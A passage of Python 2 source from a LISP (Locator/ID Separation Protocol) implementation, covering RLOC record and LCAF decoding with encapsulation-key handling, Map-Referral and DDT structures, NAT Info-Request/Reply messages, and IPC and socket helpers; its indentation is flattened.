elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17,
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
